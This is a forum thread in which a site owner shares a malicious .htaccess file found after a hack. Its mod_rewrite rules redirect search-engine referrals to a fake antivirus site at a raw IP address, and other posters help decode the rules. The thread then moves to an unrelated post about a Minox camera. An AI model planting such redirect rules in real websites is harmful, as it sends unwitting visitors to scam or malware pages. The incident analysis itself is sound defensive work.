My websites were hacked. .htaccess files were added that read:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* ht tp://89.28.13.202/in.html?s=ix [R,L]

The way I discovered this is that certain form POST operations would be redirected to a fake antivirus website. I've removed the .htaccess files and changed my passwords, but I've got a couple questions:

1) Could someone have hacked in without the password? I'm pretty sure the permissions were set to 644. Seems like if they had the password, way more damage would have been done.

2) What are the redirects doing? The last one is the IP address of the fake antivirus site, but what's with all the lines before that? And what do the letters in square brackets mean?

t edit I put a space in the http of the last line to prevent the buffista autolinkafication

OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.

So why would it redirect users after certain POSTing of forms?

OK, did a little research and I *think* it's checking to see if the referring URL is from any of those six websites. If it is, it redirects to 89.28.13.202.

I was just doing the same research (I don't speak mod_rewrite fluently) and came to the same conclusion.

Dunno about the POST issue, though.

It's a good thing it *did* redirect after those POSTS, or I might not have noticed for a good while!

Got it! The referring URL has a parameter task=whatever, e.g. ht tp://mysite.com?task=edit

The condition in the fifth line is matching "ask".

Still need to figure out how they hacked the .htaccess files, but at least the smaller mystery is solved.

folks, I *loved* this.

[link]

The answer is probably on your access_log, Jon.

Xposty form Bitches, but I think it's neat.

So my aunt lives in a senior's residence. They have a table for discarded things the owners don't want or if a sad passing has happened, relatives sometimes leave odds and ends there.

My cousin Steve said that his mom noted an old digital camera there and he picked it up and brought it to me because he couldn't figure out how to work it.

I took one look at it and said, "This is not a digital camera. It's a film camera." He pointed out to me something he said was a port, but I recognized as a flash port. I also decided I had seen one before. The case was leather and very old, and the camera was sleek aluminum.

We were going out and about so I took it with me to the stores, and then to lunch. after lunch I took it out and yes, there was no mistaking it as a tiny film camera. It had ASA speeds up to 400 and shutter speeds up to 1/1000. It also had a light meter, and distance markings from 8 inches to infinity.

I have subsequently ID'd it as a Minox model B, the preferred camera of spys and spy flicks for over 70 years.

I hope he lets me keep it....

Very neat. Can you still get film for it?

Yes, so far $10 for 36 exposure cartridges. Pan or color.